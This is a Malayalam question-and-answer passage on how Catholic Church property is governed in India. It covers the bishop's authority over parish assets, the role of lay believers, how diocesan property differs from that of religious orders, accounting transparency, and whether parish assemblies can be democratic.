നിയമത്തിലും വ്യവഹരിച്ചിട്ടുള്ളത് കത്തോലിക്കാ സഭയുടെ ഏറ്റവും ഉയര്‍ന്ന തലത്തിലുള്ള ഭരണസംവിധാനം എന്ന അര്‍ത്ഥത്തിലാണ്. കത്തോലിക്കാ സഭയുടെ ആഭ്യന്തര നിയമമായി കാനന്‍ നിയമത്തെ ഇന്ത്യന്‍ സിവില്‍ കോടതികള്‍ അംഗീകരിക്കുന്നതുകൊണ്ട് കാനന്‍ നിയമത്തില്‍ സഭയുടെ ഏറ്റവും ഉയര്‍ന്ന ഭരണസംവിധാനത്തിന് കൊടുത്തിരിക്കുന്ന പങ്കിനേയും അംഗീകരിക്കുന്നു എന്ന് കരുതണം. മറിച്ചുള്ള തീരുമാനങ്ങള്‍ ഉണ്ടായതായി അറിവില്ല.

7. ഇടവകസ്വത്തുക്കള്‍ കൈകാര്യം ചെയ്യുന്നതില്‍ മെത്രാന്‍റെ സ്ഥാനം എന്താണ്?

ശ്രദ്ധിക്കപ്പെടേണ്ട ഒരു പ്രധാന കാര്യംഇടവകകള്‍ രജിസ്റ്റര്‍ ചെയ്യപ്പെട്ടിട്ടില്ലെങ്കിലും രൂപതകള്‍ എല്ലാം രജിസ്റ്റര്‍ ചെയ്യപ്പെട്ടവയാണ് എന്നതാണ്. അവയുടെ ഭാഗം എന്ന നിലയിലാണ് രജിസ്റ്റര്‍ ചെയ്യപ്പെടാത്ത ഇടവകകളെയും അംഗീകരിക്കുന്നത്. സാധാരണയായി രൂപതയെന്ന നയ്യാമിക വ്യക്തിയുടെ സ്വത്തുക്കള്‍ കൈകാര്യം ചെയ്യുന്നതില്‍ രൂപതാ മെത്രാന് പ്രത്യേക അവകാശാധികാരങ്ങള്‍ രജിസ്റ്റര്‍ ചെയ്യുമ്പോള്‍ അംഗീകരിക്കപ്പെടുന്ന നിയമാവലിയില്‍ ഉണ്ടായിരിക്കും. സഭാനിയമത്തിലും അപ്രകാരം പ്രത്യേക അധികാരങ്ങള്‍ കൊടുത്തിട്ടുണ്ട്. അത് സിവില്‍ നിയമവും അംഗീകരിക്കുന്നു. ആ രീതിയിലാണ് രൂപതാമെത്രാന് ഇടവകകളിലും സിവില്‍ നിയമദൃഷ്ടിയില്‍ അധികാരം കിട്ടുന്നത്. സഭാ നിയമത്തില്‍ രൂപതയുടെ ഭാഗമാണ് ഇടവക. ഈ സഭാനിയമത്തെ സിവില്‍ നിയമം അംഗീകരിക്കുന്നതുകൊണ്ട് ഇടവകയില്‍ നടക്കുന്ന കാര്യങ്ങള്‍ക്ക് മെത്രാനും നിയമങ്ങള്‍ക്ക് വിധേയമായി ഒരു പരിധി വരെ ഉത്തരവാദിയായിരിക്കും. ഇക്കാരണത്താല്‍ ഇടവകയുടെ സ്വത്തുക്കള്‍ വില്ക്കുന്നതിനും കടം എടുക്കുന്നതിനും ദാനം ചെയ്യുന്നതിനും മറ്റും രൂപതാദ്ധ്യക്ഷന്‍റെ സമ്മതം ആവശ്യമാണ്. അതിര്‍ത്ഥം ആവശ്യമെന്ന് തോന്നിയാല്‍ സമ്മതം നിഷേധിക്കാം എന്ന് തന്നെയാണ്. അനധികൃതമായ സാമ്പത്തിക ഇടപാടുകള്‍ നിയന്ത്രിക്കുക എന്ന ലക്ഷ്യമാണതിനുള്ളത്.

8. രൂപതയുടെ കീഴിലുള്ള സ്ഥാപനങ്ങളിലും രൂപതയുടെ സ്വത്ത് കൈകാര്യം ചെയ്യുന്നതിലും വിശ്വാസിള്‍ക്ക് സ്ഥാനമില്ലേ?

രൂപതയുടെ സ്വത്തും സ്ഥാപനവും എന്നതുകൊണ്ട് ഉദ്ദേശിക്കുന്നത് രൂപതാകേന്ദ്രത്തില്‍ നിന്ന് നേരിട്ട് നടത്തുന്നത് എന്ന അര്‍ത്ഥത്തിലാണ് എന്ന് ഞാന്‍ കരുതുന്നു. അതുപോലെ തന്നെ വിശ്വാസി എന്ന പദം കൊണ്ട് ഉദ്ദേശിക്കുന്നത് അല്മായ വിശ്വാസികളേയും. സ്ഥാപനങ്ങളുടെ ഭരണത്തില്‍ സിവില്‍ നിയമത്തിന് വിധേയമായി ആര്‍ക്കു വേണമെങ്കിലും പങ്കാളിത്വം ഉണ്ടാകാം. അതില്‍ രൂപതയിലെ വൈദികരും സന്യസ്തരും അല്മായരുമായ വിശ്വാസികള്‍ ഉണ്ടാകാം. അതെല്ലാം നിയന്ത്രിക്കപ്പെടുന്നത് സഭയുടെയും രാജ്യത്തിന്‍റെയും നിയമങ്ങളാലാണ്. മുമ്പ് സൂചിപ്പിച്ചതുപോലെ ഇന്നുള്ള നിയമങ്ങള്‍ ഫലപ്രദമായി ഉപയോഗിച്ചാല്‍ അല്മായ വിശ്വാസികള്‍ക്ക് വലിയ പങ്കാളിത്തമുണ്ടാകും. കാരണം അങ്ങനെയാണ് സഭാഭരണസംവിധാനം സംവിധാനം ചെയ്യപ്പെട്ടിരിക്കുന്നത്. എങ്കിലുംനേരത്തെ പറഞ്ഞ കാരണങ്ങളാല്‍ രൂപതാദ്ധ്യക്ഷന്‍റെ പങ്ക് നിര്‍ണ്ണായകമാണ്. അല്ലെങ്കില്‍ നിലവിലുള്ള നിയമങ്ങളില്‍ അടിസ്ഥാനപരമായ മാറ്റങ്ങള്‍ ഉണ്ടാ‍കണം. അല്മായ വിശ്വാസികള്‍ക്ക് പങ്കാളിത്തം കൊടുത്തതുകൊണ്ട് മാത്രം കൈകാര്യം ചെയ്യല്‍ നന്നാകണമെന്നില്ലല്ലൊ. അവിടെയും അപചയങ്ങള്‍ ഉണ്ടാകാം.

പാസ്റ്ററല്‍ സെന്‍റര്‍ ഡയറക്ടര്‍, കോര്‍പ്പറേറ്റ് മാനേജര്‍, കോളേജ് മാനേജര്‍, രൂപതാപ്രൊക്യുറേറ്റര്‍, എസ്റ്റേറ്റ് മാനേജര്‍, ബാലഭവന ഡയറക്ടര്‍, വൃദ്ധസദന ഡയറക്ടര്‍, ഇംഗ്ലീഷ് മീഡിയം സ്കൂള്‍ മാനേജര്‍ തുടങ്ങിയ സ്ഥാനങ്ങളിലെല്ലാം അല്മായ വിശ്വാസികളെ നിയമിക്കാന്‍ തടസ്സമൊന്നുമില്ല. അവയുടെ ഭരണസമിതികളിലും അവരെ ഉള്‍പ്പെടുത്തുന്നതിന് തടസ്സമില്ലെന്നല്ല ഉള്‍പ്പെടുത്തേണ്ടതുമാണ്. എന്തുകൊണ്ട് അതുണ്ടാകുന്നില്ല എന്ന ചോദ്യം പ്രസക്തമാണ്. കാരണം പലതാണ്. ഒന്നാമതായി, ഇതില്‍ പലതും മുഴുവന്‍സമയ ജോലികളും നല്ല പരിശീലനം അവശ്യമായവയുമാണ്. അല്മായ വിശ്വാസികള്‍ അങ്ങനെ ജോലി ചെയ്യണമെങ്കില്‍ അവരുടെ കുടുംബത്തെ സംരക്ഷിക്കാന്‍ ആവശ്യമായത്ര ശമ്പളം കൊടുക്കേണ്ടി വരും. അതിന് രൂപതകള്‍ക്കോ ഇടവകകള്‍ക്കോ ആസ്തിയുണ്ടാകുകയില്ല. മാത്രമല്ല ജോലിസമയവും അതിനനുസരിച്ച് ക്രമപ്പെടുത്തണം. അതും ഇവിടുത്തെ സഭാഭരണ സാഹചര്യത്തില്‍ വളരെ ബുദ്ധിമുട്ടുകള്‍ ഉണ്ടാക്കും. പാശ്ചാത്യരാജ്യങ്ങളില്‍ സഭയുടെ സ്വത്തുക്കള്‍ കൈകാര്യം ചെയ്യുന്നത് കൂടുതലും അല്മായ വിശ്വാസികളാണ്. അവര്‍ മറ്റ് തലങ്ങളില്‍ ജോലി ചെയ്യുന്നവരേപ്പോലെ ശമ്പളവും പെന്‍ഷനും പറ്റുകയും ചെയ്യുന്നു. കാരണം അവിടുത്തെ രൂപതകള്‍ക്കും ഇടവകകള്‍ക്കും അതിനുള്ള സാമ്പത്തികശേഷിയുണ്ട്. മാത്രമല്ല സിവില്‍ നിയമമനുസരിച്ച് അങ്ങനെ ചെയ്തേ മതിയാകൂ. അവരുടെ അധികാരത്തെ മാനിക്കാന്‍ അവിടത്തെ വൈദികരുള്‍പ്പടെയുള്ള സഭാംഗങ്ങള്‍ തയ്യാറുമാണ്. രണ്ടാമതായി, അല്മായ വിശ്വാസികള്‍ എന്തെങ്കിലും ഒരു അഴിമതി നടത്തിയാല്‍ അങ്ങനെ ചെയ്യുന്നവരെ കണ്ടെത്തി ശിക്ഷിക്കാന്‍ വളരെയേറെ സംവിധാനങ്ങള്‍ സഭക്ക് ആവശ്യമാണ്. കുറ്റക്കാരെന്ന് കണ്ടെത്തിയാല്‍ തന്നെ ജോലിയില്‍ നിന്ന് പിരിച്ചുവിടാം എന്നല്ലാതെ മറ്റ് നടപടികളൊന്നും സാദ്ധ്യമല്ല.വൈദികരുടെ കാര്യം അങ്ങനെയല്ല. അവരുടെ മേല്‍ രൂപതാദ്ധ്യക്ഷന് കൂടുതല്‍ നിയന്ത്രണങ്ങളുണ്ട്.

9. രൂപതയുടെ സ്വത്തുവകകളും സന്യാസസഭകളുടെ സ്വത്തുവകകളും തമ്മിലുള്ള വ്യത്യാസമെന്ത്?

രൂപതകളും സന്യാസസഭകളും വ്യത്യസ്ത നയ്യാമിക വ്യക്തികളാണ്. അതുകൊണ്ട് സന്യാസസഭകളുടെ സ്വത്തിന്മേല്‍ സിവില്‍ നിയമപരമായി അങ്ങനെ വ്യവസ്ഥ ചെയ്യാത്ത പക്ഷം രൂപതാദ്ധ്യക്ഷന് യാതൊരു തരത്തിലുള്ള അധികാരങ്ങളുമില്ല. എന്നല്ല, അല്മായ വിശ്വാസികള്‍ ഉള്‍പ്പെടെ മറ്റാര്‍ക്കും അവകാശാധികാരങ്ങളില്ല. അവര്‍ നടത്തുന്ന സ്ഥാപനങ്ങളുടെ കാര്യത്തിലും ഇത് തന്നെയാണ് സ്ഥിതി.കത്തോലിക്കാ സഭയിലെ ഏതാനും അല്മായര്‍ ചേര്‍ന്ന് ഒരു ട്രസ്റ്റുണ്ടാക്കി സ്കൂള്‍ നടത്തിയാല്‍ സിവില്‍ നിയമദൃഷ്ടിയില്‍ അതൊരു ന്യൂനപക്ഷ സ്ഥാപനമാണ്. ന്യൂനപക്ഷങ്ങള്‍ക്ക് കിട്ടുന്ന എല്ലാ ആനുകൂല്യങ്ങളും നിയമങ്ങള്‍ക്ക് വിധേയമായി അവര്‍ക്ക് ലഭ്യമാണ്. ആ സ്കൂളിനെ നിയന്ത്രിക്കാന്‍ മറ്റാര്‍ക്കും അനുവാദവുമില്ല. ഇതുപോലെ തന്നെയാണ് സന്യാസസഭകളുടെ സ്വത്തിന്‍റെ കാര്യവും.

എന്നാല്‍ സഭാനിയമദൃഷ്ടിയില്‍ സന്യാസസഭകളുടെ സ്വത്തുക്കള്‍ സഭാസ്വത്ത് തന്നെയാണ്. അതുകൊണ്ട് അവ ഭരിക്കപ്പെടേണ്ടത് സഭാനിയമങ്ങളുടേയും അടിസ്ഥാനത്തിലാണ്. അതിനാല്‍ അവയുടെ ഉപയോഗത്തില്‍ അപചയങ്ങള്‍ കടന്നു കൂടിയാല്‍ അക്കാര്യം ചൂണ്ടിക്കാണിക്കാനും ബന്ധപ്പെട്ടവരെ അറിയിക്കാനും വേണ്ടി വന്നാല്‍ ആവശ്യമായ നടപടി എടുക്കാനും പ്രാദേശിക സഭാനേതൃത്വത്തിന് അധികാരമുണ്ട്.എങ്കിലും പ്രത്യേകം ഓര്‍ക്കേണ്ടത് സന്യാസസഭാസ്വത്തിന്‍റെ കാര്യത്തില്‍ രൂപതാദ്ധ്യക്ഷന് ധാര്‍മ്മികമായ ചില നിയന്ത്രണാധികാരമേയുള്ളു എന്നതാണ്. അത് മാനിക്കപ്പെടുന്നില്ലെങ്കില്‍ തന്‍റെ രൂപതയില്‍ ബന്ധപ്പെട്ട സന്യാസസമൂഹത്തിന്‍റെ പ്രവര്‍ത്തനം അവസാനിപ്പിക്കാം.സ്ഥാപനം നടത്താന്‍ കൊടുത്തിരിക്കുന്ന അനുവാദം പിന്‍‌വലിക്കാനും സാദ്ധ്യതയുണ്ട്. എന്നാല്‍ അങ്ങനെയുള്ള നടപടികള്‍ പല കാരണങ്ങളാല്‍ അത്ര എളുപ്പം എടുക്കാന്‍ സാധിക്കുകയില്ല. ഉദാഹരണമായി രൂപതാദ്ധ്യക്ഷന്‍റെ നിര്‍ദ്ദശങ്ങള്‍ പാലിക്കപ്പെടാത്ത ഒരു സ്ക്കൂള്‍ അടച്ചുപൂട്ടാന്‍ നിര്‍ദ്ദേശിച്ചാല്‍ പൊതുജനത്തിന്‍റെ ഭാഗത്ത് നിന്ന് ഉണ്ടാകാവുന്ന പ്രതികരണം ഊഹിക്കാവുന്നതേയുള്ളു. മാത്രമല്ല ആരോപണങ്ങള്‍ കൃത്യമായി പഠിച്ച് തെളിയിക്കുകയും വേണം. അതൊന്നും അത്ര എളുപ്പം സാധിക്കുന്ന കാര്യങ്ങളല്ല. ആരോപണങ്ങള്‍ തെളിയിച്ച് നടപടികള്‍ എടുത്താല്‍ പോലും അവ അനുസരിക്കപ്പെടുന്നില്ലെങ്കില്‍ നിര്‍ബന്ധിച്ച് അനുസരിപ്പിക്കാനും കഴിയില്ല.

10. സഭാസ്വത്തുക്കള്‍ കൈകാര്യം ചെയ്യുന്നതിലുള്ള സുതാര്യത കാത്തുസൂക്ഷിക്കാനുള്ള മാര്‍ഗ്ഗങ്ങളും മാനദണ്ഡങ്ങളും എന്തെല്ലാം?

ബന്ധപ്പെട്ടവര്‍ എല്ലാവരും സഭാസ്വത്തുക്കളുടെ ഭരണം സംബന്ധിച്ച നിയമങ്ങള്‍, സഭാനിയമത്തിലും സിവില്‍ നിയമത്തിലും ഉള്ളത്, നന്നായി പഠിക്കുകയും അവ നടപ്പാക്കാന്‍ ബന്ധപ്പെട്ടവരെ സഹായിക്കുകയും വേണ്ടി വന്നാല്‍ നിര്‍ബനന്ധിക്കുകയും ചെയ്യുക എന്നതാണ് സുതാര്യത കാത്തുസൂക്ഷിക്കാനുള്ള ഏറ്റവും നല്ല മാര്‍ഗ്ഗം . സമിതികളിലും മറ്റും പങ്കെടുക്കാന്‍ അവകാശവും ഉത്തരവാദിത്വവും ഉള്ളവര്‍ തങ്ങളുടെ അവകാശങ്ങള്‍ കൃത്യമായി ഉപയോഗിക്കുകയും ഉത്തരവാദിത്വങ്ങള്‍ യഥാവിധി നിര്‍വ്വഹിക്കുകയും ചെയ്യുക എന്നതു തന്നെയാണ് പ്രധാന മാനദണ്ഡം. അതിനായി ആ അവകാശങ്ങളും അധികാരങ്ങളും കടമകളും നിയമത്തില്‍ നിര്‍വ്വചിക്കപ്പെട്ടിരിക്കുന്നത് ബന്ധപ്പെട്ട എല്ലാവരും അറിഞ്ഞിരിക്കുകയും വേണം. സ്വാര്‍ത്ഥതയും ഭയവും ഒന്നും ഇക്കാര്യത്തില്‍ ഉണ്ടാകാനും പാടില്ല.

സ്വത്ത് വര്‍ദ്ധിപ്പിക്കാനും സംരക്ഷിക്കാനും സ്ഥാപനങ്ങള്‍ നിര്‍മ്മിക്കാനും മറ്റുമുള്ള ശ്രമത്തില്‍ വൈദികരുടെ ഭാഗത്ത് നിന്നുണ്ടാകുന്ന നിര്‍ബന്ധബുദ്ധിയും സുതാര്യതയില്ലായ്മയും ഏകാധിപത്യപ്രവണതയും പോലെയുള്ള അപചയങ്ങളാണ് പരാതികള്‍ക്ക് പലപ്പോഴും കാരണമാകുന്നത്. നിയമങ്ങള്‍ കൃത്യമായി പാലിക്കാനുള്ള വിമുഖത വളരെ വ്യാപകമാണെന്നത് നിര്‍ഭാഗ്യകരമാണ്. ഈ പ്രവണത ശക്തി പ്രാപിക്കുന്നതിനനുസരിച്ച് അല്മായ വിശ്വാസികള്‍ അവയില്‍ നിന്ന് കൂടുതല്‍ കൂടുതല്‍ അകലുന്നു എന്നതും വസ്തുതയാണ്. അതോടൊപ്പം സഭാനിയമങ്ങളിലും ഭരണസംവിധാനങ്ങളിലുമുള്ള അറിവില്ലായ്മയും കൂടിയാകുമ്പോള്‍ അല്മായ വിശ്വാസികള്‍ക്ക് തങ്ങള്‍ തീര്‍ത്തും അവഗണിക്കപ്പെട്ടതായി അനുഭവപ്പെടുന്നു. നിയമങ്ങളിലും ഭരണസംവിധാനങ്ങളിലും അറിവ് സമ്പാദിക്കുകയും തങ്ങള്‍ക്ക് അനുവദനീയമായ സമിതികളില്‍ ക്രമമായും സജീവമായും പങ്കെടുക്കുകയും ചെയ്യുക എന്നതുമാണ് ഇതിന് പരിഹാരമായിട്ടുള്ളത്. അതുപോലെ തന്നെ എല്ലാ സാമ്പത്തിക ഇടപാടുകളും നിയമാനുസൃതം നടക്കുന്നു എന്ന് പൊതുയോഗാംഗങ്ങള്‍ ഉറപ്പു വരുത്തുകയും ചെയ്യണം. ഉദാഹരണമായി ഒരു മീറ്റിംഗില്‍ നടന്ന കാര്യങ്ങളുടെ റിപ്പോര്‍ട്ട് അല്ലെങ്കില്‍ മിനിറ്റ്സ് അടുത്ത മീറ്റിംഗില്‍ വായിക്കുകയും മുമ്പെടുത്ത തീരുമാനങ്ങള്‍ നടപ്പാക്കിയതിന്‍റെയും നടപ്പാക്കാതെ പോയതിന്‍റെയും അവലോകനം നടത്തുകയും ചെയ്യണം. അത് ആവശ്യപ്പെടാന്‍ കൈക്കാരന്മാര്‍ക്കും യോഗാംഗങ്ങള്‍ക്കും അല്ലെങ്കില്‍ പ്രതിനിധിയോഗാംഗങ്ങള്‍ക്കും അവകാശവും കടമയും ഉണ്ട്. സമയാസമയങ്ങളില്‍ രൂപതാകേന്ദ്രത്തിലേക്ക് കൊടുക്കേണ്ട കണക്കുകളും വിഹിതങ്ങളും കൊടുത്തൊ എന്നും ഇല്ലെങ്കില്‍ എന്തുകൊണ്ട് എന്ന് അന്വേഷിക്കേണ്ട ചുമതലയും അവരുടേത് തന്നെ. അവരുടെ അന്വേഷണങ്ങള്‍ക്ക് മറുപടി കിട്ടുന്നില്ലെങ്കില്‍ അടുത്ത മീറ്റിംഗില്‍ അതൊരു അജണ്ടാവിഷയമായി കൊണ്ടു വന്ന് ചര്‍ച്ച ചെയ്ത് പരിഹാരമുണ്ടാക്കണം. അജണ്ടയിലേക്കുള്ള വിഷയങ്ങള്‍ മീറ്റിംഗിനു മുമ്പായി എഴുതിക്കൊടുക്കുന്നതാണ് ഉത്തമം.
സാമ്പത്തികകാര്യങ്ങളുടെ കണക്കുകള്‍ സിവില്‍ നിയമങ്ങള്‍ക്കും സഭാനിയമങ്ങള്‍ക്കും വിധേയമായി കൃത്യമായി എഴുതി സൂക്ഷിച്ചാല്‍ തന്നെ സുതാര്യത വലിയൊരളവില്‍ ഉണ്ടാകും. ആവശ്യമായ എല്ലാ അനുബന്ധ രേഖകളും ഉണ്ടായിരിക്കണം. ഉദാഹരണം ബില്ല്, രസീത്, വൌച്ചര്‍ തുടങ്ങിയവ. ഈ അനുബന്ധ രേഖകള്‍ ഇല്ലാതെ എഴുതുന്ന കണക്കുകള്‍ കൃത്യമായിരിക്കുകയില്ല എന്ന് പറയേണ്ടതില്ലല്ലൊ. ശരിയായ രേഖകള്‍ ഇല്ലാതെ സര്‍ക്കാരിനെ കബളിപ്പിച്ച് നികുതി ലാഭിക്കുന്നതും മറ്റും ഒരിക്കലും നീതീകരിക്കത്തക്കതല്ല. കൈക്കൂലി കൊടുക്കുമ്പോഴും കണക്കുകള്‍ സുതാര്യമായി എഴുതാന്‍ കഴിയില്ല. എല്ലാ പണയിടപാടുകളും ബാങ്ക് വഴി മാത്രം ആക്കുകയും നോട്ടിന്‍റെ ഉപയോഗം പരമാവധി കുറക്കുകയും ചെയ്യണം. ഇടവകക്കും സ്ഥാപനങ്ങള്‍ക്കും കിട്ടുന്ന പണം കള്ളപ്പണമല്ല എന്ന് ഉറപ്പ് വരുത്തിയാല്‍ കണക്കെഴുതുന്നതില്‍ സുതാര്യത എളുപ്പമാകും. പ്രത്യേകിച്ച് നിര്‍മ്മാണപ്രവര്‍ത്തനങ്ങള്‍ക്ക് കിട്ടുന്ന സംഭാവനകള്‍ കള്ളപ്പണമല്ല എന്ന് ബന്ധപ്പെട്ടവര്‍ തീര്‍ച്ചയാക്കണം. സ്ഥാപനങ്ങളില്‍ കിട്ടുന്ന തുകകള്‍ യാതൊരു കാരണവശാലും നോട്ടായി വാങ്ങാതെയും കൊടുക്കാതെയും ഇരുന്നാല്‍ ആ രീതിയിലുള്ള സുതാര്യതക്കുറവും സംശയങ്ങളും ഇല്ലാതാക്കാന്‍ കഴിയും.നിയമാനുസൃതം ആലോചിക്കേണ്ട എല്ലാ സമിതികളിലും അലോചിക്കുകയും വേണം.

നാമിന്ന് ജീവിക്കുന്നത് ഡിജിറ്റല്‍ യുഗത്തിലായതിനാല്‍ മേല്പ്പറഞ്ഞ രീതികള്‍ അവലംബിക്കാന്‍ പ്രയാസമൊന്നുമില്ല. ചില രൂപതകളിലെ ഇടവകകളിലും സ്ഥാപനങ്ങളിലും കണക്കുകള്‍ ഓണ്ലൈനായിട്ടാണ് തയ്യാറാക്കുന്നതും രൂപതാ കേന്ദ്രത്തിലേക്ക് അയക്കുന്നതും. അതുകൊണ്ട് നല്ലൊരളവു വരെ അവ സുതാര്യവും കൃത്യവും ആയിരിക്കും. എങ്കിലും സുതാര്യത ഉണ്ടാകരുത് എന്ന് മനഃപൂര്‍വ്വം വിചാരിച്ചാല്‍ സാധിക്കും എന്നതും വസ്തുതയാണ്. അതുകൊണ്ട് സത്യസന്ധത ഇതില്‍ വളരെ പ്രധാനപ്പെട്ട ഒരു ഘടകമാണ്.

പല കാരണങ്ങള്‍ കൊണ്ടും കണക്കുകള്‍ കൃത്യമായി രൂപതാകേന്ദ്രത്തില്‍ സമര്‍പ്പിക്കാന്‍ പലരും മടി കാണിക്കാറുണ്ട്. ചിലപ്പോള്‍ അത് നല്ല ഉദ്ദേശ്യത്തോടെയുമാണ്. ഉദാഹരണമായി, പള്ളിനിര്‍മ്മാണം നടന്നുകൊണ്ടിരിക്കുന്ന ഇടവകകളില്‍ നിന്നുള്ള കണക്കുകള്‍ പലപ്പോഴും മാസാമാസം കൃത്യമായി കിട്ടാറില്ല. കയ്യില്‍ ഉള്ള തുകയുടെ കൃത്യം കണക്ക് ഇടവകക്കാരെ അറിയിച്ചാല്‍ പിന്നെ കിട്ടാനുള്ള വിഹിതം കൊടുക്കുകയില്ല എന്നൊരു വാദമാണ് പ്രധാനമായും ഇതിന്‍റെ പിന്നിലുള്ളത്. വസ്തുത കുറെയൊക്കെ ശരിയാണെങ്കിലും ആ രീതിയുടെ ധാര്‍മ്മികത ചോദ്യം ചെയ്യപ്പെടേണ്ടതാണ്. മാത്രമല്ല അനാവശ്യമായ സംശയങ്ങള്‍ ഉടലെടുക്കുകയും ആരോപണങ്ങള്‍ ഉണ്ടാകുകയും ചെയ്യും. രൂപതാവിഹിതം കൊടുക്കാതിരിക്കാന്‍ വേണ്ടി വിഹിതത്തിന് പരിഗണിക്കപ്പെടേണ്ട വരവുകളില്‍ പലതും വക മാറ്റി ഇടവകകളില്‍ പലരും എഴുതുന്നുണ്ട് എന്നതും പരസ്യമായ രഹസ്യമാണ്. ഇതിനെല്ലാം അറുതി വരുത്തണമെങ്കില്‍ പള്ളിയോഗവും പ്രതിനിധിയോഗവും കൈക്കാരന്മാരും കണക്കനും എല്ലാം അവരുടെ ഉത്തരവാദിത്വം ഭയവും മടിയും കൂടാതെ ചെയ്യാന്‍ തയ്യാറാകണം. വൈദികര്‍ ഇതിനെല്ലാം പിന്‍‌തുണ കൊടുക്കുകകയും വേണം അവരോട് സഹകരിക്കുകയും വേണം.

11. സഭാസ്വത്തുക്കളുടെ കൈകാര്യം ചെയ്യലിനു ജനാധിപത്യ സംവിധാനമല്ലേ ആവശ്യം? അത് ഇന്ന് എത്ര മാത്രം പ്രായോഗികമാണ്?

ജനാധിപത്യ സംവിധാനമനുസരിച്ച് സ്വത്തുക്കള്‍ കൈകാര്യം ചെയ്താല്‍ സഭയിലെ സ്വത്തുസംബന്ധമായ പ്രശ്നങ്ങള്‍ എല്ലാം അവസാനിക്കണമെന്നില്ല. കൈകാര്യം ചെയ്യുന്നവരുടെ സത്യസന്ധതയും ആത്മാര്‍ത്ഥതയും നിസ്വാര്‍ത്ഥതയും മറ്റും ഇല്ലെങ്കില്‍ ജനാധിപത്യസംവിധാനം കൊണ്ട് ഒരു പ്രയോജനവും ഉണ്ടാകുകയില്ലെന്ന് നമ്മുടെ രാജ്യത്തെ അനുഭവം പഠിപ്പിക്കുന്നുണ്ടല്ലൊ.

സഭ അടിസ്ഥാനപരമായി ജനാധിപത്യക്രമമല്ല പിന്‍‌തുടരുന്നത് കാരണം അതിന് സിവില്‍ സമൂഹങ്ങളില്‍ നിന്നും വ്യത്യസ്തമായ ഒരു പ്രകൃതിയാണുള്ളത്. എങ്കിലും പല കാര്യങ്ങളിലും ജനാധിപത്യരീതികള്‍ തന്നെയാണ് സ്വീകരിച്ചിട്ടുള്ളത്. ഉദാഹരണമായി ഒരു ഇടവകയിലെ സ്വത്തുക്കള്‍ എങ്ങനെയെല്ലാം വിനിയോഗിക്കണം എന്ന് തീരുമാനിക്കുന്നത് ഇടവകയിലെ നയ്യാമിക സമിതികളാണല്ലോ. സഭയുടെ പ്രത്യേക നയ്യാമിക പ്രകൃതി കാരണം അതില്‍ വികാരിയുടേയും രൂപതാദ്ധ്യക്ഷന്‍റെയും മറ്റും അധികാരം നിര്‍ണ്ണായകമാണെന്ന് മാത്രം. സിവില്‍ നിയമങ്ങളും അപ്രകാരം അനുശാസിക്കുന്നു എന്നതുകൊണ്ട് അത്തരം കാര്യങ്ങളെ ഇല്ലാതാക്കുക എളുപ്പമല്ല.

ഇന്നത്തെ സിവില്‍, കാനന്‍ നിയമ സംവിധാനത്തില്‍ സഭാസ്വത്തുക്കളുടെ കൈകാര്യം ചെയ്യല്‍ പൂര്‍ണ്ണമായും ജനാധിപത്യപരമാക്കുക സാധ്യമല്ല. ഇത് സിവില്‍ തലത്തിലും സാദ്ധ്യമല്ല. കാരണം അവിടെ ഭൂരിപക്ഷത്തിന്‍റെ അഭിപ്രായം മാത്രമേ നടക്കുകയുള്ളു. ഒരു നിയമനിര്‍മ്മാണസഭയിലെ ഭൂരിപക്ഷത്തിന്‍റെ അഭിപ്രായം രാജ്യത്തെ ജനങ്ങളുടെ അഭിപ്രായമല്ലല്ലൊ. ഭരിക്കുന്ന കക്ഷിക്ക് ഭൂരിപക്ഷമുള്ളതുകൊണ്ട് ബാക്കി ആരെല്ലാം എതിര്‍ത്താലും നിയമവിധേയമായിട്ടാണെങ്കിലും അവര്‍ അവര്ക്കിഷ്ടം പോലെ കാര്യങ്ങള്‍ നടത്തും. കത്തോലിക്കാസഭയിലും ഇതു തന്നെയായിരിക്കും സംഭവിക്കുക എന്ന് ന്യായമായും ഊഹിക്കാം.

12. പള്ളിപ്പൊതുയോഗങ്ങള്‍ വെറും നാമമാത്ര കൂട്ടായ്മകളല്ലെ? യഥാര്ത്ഥ അധികാരം മെത്രാനല്ലെ?

മുമ്പ് സൂചിപ്പിച്ചതുപോലെ പള്ളിപ്പൊതുയോഗങ്ങളെ വെറും കൂട്ടായ്മകളായോ പല്ലും നഖവും ഉള്ള സമിതികളാക്കി മാറ്റാനോ അതിലെ അംഗങ്ങള്‍ക്ക് കഴിയും. അവരതിന്റെ പ്രവര്‍ത്തനനിയമങ്ങള്‍ പഠിക്കുകയും ധൈര്യപൂര്‍വ്വം നടപ്പിലാക്കാന്‍ ശ്രമിക്കുകയും വേണം. എല്ലാ കാര്യങ്ങളും വികാരിയച്ചന് വിട്ടു കൊടുത്തിട്ട് യോഗാംഗങ്ങള്‍ നിഷ്ക്രിയരായിരുന്നാല്‍ പൊതുയോഗങ്ങള്‍ വെറും കൂട്ടായ്മയായി മാറും. അവകാശങ്ങളോടൊപ്പം ഉത്തരവാദിത്വങ്ങളും പൊതുയോഗം ഏറ്റെടുക്കണം. പള്ളി പണിയണം എന്ന് തീരുമാനിച്ച് പണം കണ്ടെത്താന്‍ വികാരിയച്ചനെ ഏല്‍പ്പിച്ചാല്‍ പോരാ. അവര്‍ തന്നെ അതിന് ആവശ്യമായ കമ്മിറ്റികള്‍ രൂപീകരിച്ച് പണം സ്വരൂപിക്കുകയും അവ സമയാസമയങ്ങളില്‍ ബാങ്കില്‍ നിക്ഷേപിക്കുകയും കണക്ക് കൃത്യമായി എഴുതി ബന്ധപ്പെട്ടവരെ ബോദ്ധ്യപ്പെടുത്തുകയും ചെയ്യണം. അതുപോലെ തന്നെ പണികളുടെ കാര്യങ്ങള്‍ നോക്കി നടത്താനും തയ്യാറാകണം. അങ്ങനെ വന്നാല്‍ പള്ളിപ്പൊതുയോഗങ്ങള്‍ വെറും കൂട്ടായ്മകള്‍ എന്ന പഴി കേള്‍ക്കേണ്ടി വരില്ല.

